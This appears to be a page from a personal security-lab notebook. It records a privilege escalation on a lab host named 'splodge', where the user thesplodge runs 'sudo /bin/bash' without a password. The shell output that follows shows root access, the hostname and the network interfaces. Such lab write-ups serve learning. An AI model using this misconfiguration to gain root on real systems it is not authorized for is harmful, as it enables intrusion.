InfoSec LAB

sudo bash

The thesplodge user has sudo privileges to execute the /bin/bash command as anyone without getting prompted for password.

[thesplodge@splodge .pgdata]$ sudo /bin/bash
whoami
root
hostname
splodge
/sbin/ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.219.108  netmask 255.255.255.0  broadcast 192.168.219.255
        ether 00:50:56:9e:e3:9a  txqueuelen 1000  (Ethernet)
        RX packets 1324004  bytes 172262049 (164.2 MiB)
        RX errors 0  dropped 3096  overruns 0  frame 0
        TX packets 1011894  bytes 799518134 (762.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 17409  bytes 4503877 (4.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 17409  bytes 4503877 (4.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System level compromise

InfoSec LAB

Explorer

Splodge_Privilege_Escalation

sudo bash

Interactive Graph View

Backlinks